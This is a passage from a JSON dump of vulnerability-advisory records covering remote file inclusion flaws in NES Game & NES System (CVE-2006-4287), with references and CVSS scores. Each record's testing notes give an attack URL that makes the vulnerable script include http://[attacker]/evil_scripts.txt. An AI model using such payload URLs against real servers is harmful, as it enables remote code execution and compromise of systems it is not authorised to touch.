arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to widgets/localinc.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/widgets/localinc.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28053](https://vulners.com/osvdb/OSVDB:28053)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28052", "id": "OSVDB:28052", "type": "osvdb", "title": "NES Game & NES System widgets/localinc.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2006-4287"], "edition": 1, "description": "## Vulnerability Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to NavTable.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nNES Game & NES System contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to NavTable.php not properly sanitizing user input supplied to the 'phphtmllib' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[NES_path]/phphtmllib/widgets/NavTable.php?phphtmllib=[http://[attacker]/evil_scripts.txt]\n## References:\nVendor URL: http://sourceforge.net/projects/nesgame/\n[Secunia Advisory ID:21593](https://secuniaresearch.flexerasoftware.com/advisories/21593/)\n[Related OSVDB ID: 28051](https://vulners.com/osvdb/OSVDB:28051)\n[Related OSVDB ID: 28045](https://vulners.com/osvdb/OSVDB:28045)\n[Related OSVDB ID: 28050](https://vulners.com/osvdb/OSVDB:28050)\n[Related OSVDB ID: 28054](https://vulners.com/osvdb/OSVDB:28054)\n[Related OSVDB ID: 28046](https://vulners.com/osvdb/OSVDB:28046)\n[Related OSVDB ID: 28047](https://vulners.com/osvdb/OSVDB:28047)\n[Related OSVDB ID: 28049](https://vulners.com/osvdb/OSVDB:28049)\n[Related OSVDB ID: 28052](https://vulners.com/osvdb/OSVDB:28052)\n[Related OSVDB ID: 28044](https://vulners.com/osvdb/OSVDB:28044)\n[Related OSVDB ID: 28048](https://vulners.com/osvdb/OSVDB:28048)\nGeneric Exploit URL: http://milw0rm.com/exploits/2226\nFrSIRT Advisory: ADV-2006-3339\n[CVE-2006-4287](https://vulners.com/cve/CVE-2006-4287)\nBugtraq ID: 19611\n", "modified": "2006-08-20T10:03:58", "published": "2006-08-20T10:03:58", "href": "https://vulners.com/osvdb/OSVDB:28053", "id": "OSVDB:28053", "type": "osvdb", "title": "NES Game & NES System NavTable.php phphtmllib Variable Remote File Inclusion", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}